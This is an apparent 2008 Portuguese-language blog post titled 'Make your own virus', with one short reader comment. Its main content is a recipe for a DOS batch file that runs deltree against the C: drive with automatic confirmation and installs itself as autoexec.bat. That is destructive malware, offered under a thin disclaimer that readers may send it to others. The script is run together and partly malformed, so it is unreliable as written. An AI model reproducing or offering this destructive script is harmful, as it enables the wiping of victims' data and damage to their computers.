quarta-feira, junho 25, 2008

Faça voce mesmo seu Virus...

Se acha arriscado é melhor não fazer ok, pra quem nunca fez um virus pode ser um grande susto
hushuashushuasah
Olha faço meus virus no proprio pc, e não os uso contra ninguem, e nem queria que vcs usasem soh estou passando um conhecimento que eu gostaria que me passasem tbm, mas se quiserem mandar pra pessoas eu n me responsabilizo por atos de outras pessoas.oK
Bom, como fazer o virus?eh muito facil, vc pode aplicar no ms-dos mais pra novatos como eu isso eh meio complicado paesar de eu conseguir fazer.faça o seguinte: abra um bloco de notas ou um word e escrve os seguintes codigos:@ECHO OFF@BREAK OFFdeltree/C: Y\*.*A: (nome do virus).bat autoexec.batEm seguida salve esse arquivo assim : (Nome do virus).batpronto agora vc tem um virus no seu computador, mas avisando desde ja, sevc n tem conhecimento, nem que ache que fez o programa errado abra esse documento.pode ser perigoso infectar o proprio pc.bom ai esta oq eu aprendi e espero que vcs entendam que conhecimento n eh crime, crime eh usar o conhecimento pra oq n presta.

1 comentários:

Anônimo disse...

Este site é muito bom ......
adorei

  ©Template by Jackson Webdesign.

TOPO